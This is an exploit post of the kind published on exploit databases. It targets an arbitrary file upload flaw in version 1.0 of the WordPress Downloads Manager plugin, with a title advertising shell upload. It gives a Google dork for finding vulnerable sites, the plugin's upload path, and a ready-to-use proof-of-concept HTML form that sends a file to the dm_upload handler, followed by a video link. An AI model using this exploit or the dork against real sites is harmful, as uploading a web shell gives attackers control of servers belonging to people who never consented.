Wordpress Downloads Manager Exploit Upload shell

1. <!--
2.  
3.  
4.     \ \   / (_)_ __ _   _ ___\ \/ /  _ \ ____
5.      \ \ / /| | '__| | | / __|\  /| | | |_  /
6.       \ V / | | |  | |_| \__ \/  \| |_| |/ /
7.        \_/  |_|_|   \__,_|___/_/\_\____//___|
8.        
9.                                               -->
10. #########################################################
11. # Exploit Title: Wordpress Downloads Manager Arbitrary File Upload Vulnerability
12. # Category: webapps
13. # version affected : 1.0
14. # Google Dork : inurl:wp-content/plugins/downloads-manager/
15. #               Index of /wp-content/plugins/downloads-manager
16. ########################################################
17.  
18. -------------------------------------------------------------------------------
19. #
20. #
21. # File Path
22. #
23. # /wp-content/plugins/downloads-manager/upload/
24. #
25. # [-]Proof of Concept
26. -------------------------------------------------------------------------------
27. <html>
28. <body>
29. <form action="http://[path to WordPress]" method="POST" enctype="multipart/form-data">
30. <input type="hidden" name="dm_upload" />
31. <input type="file" name="upfile" />
32. <input type="submit" value="Submit" />
33. </form>
34. </body>
35. </html>
36.  
37. -------------------------------------------------------------------------------
38.  
39. video
40. https://youtu.be/rJ-0OgZnmeg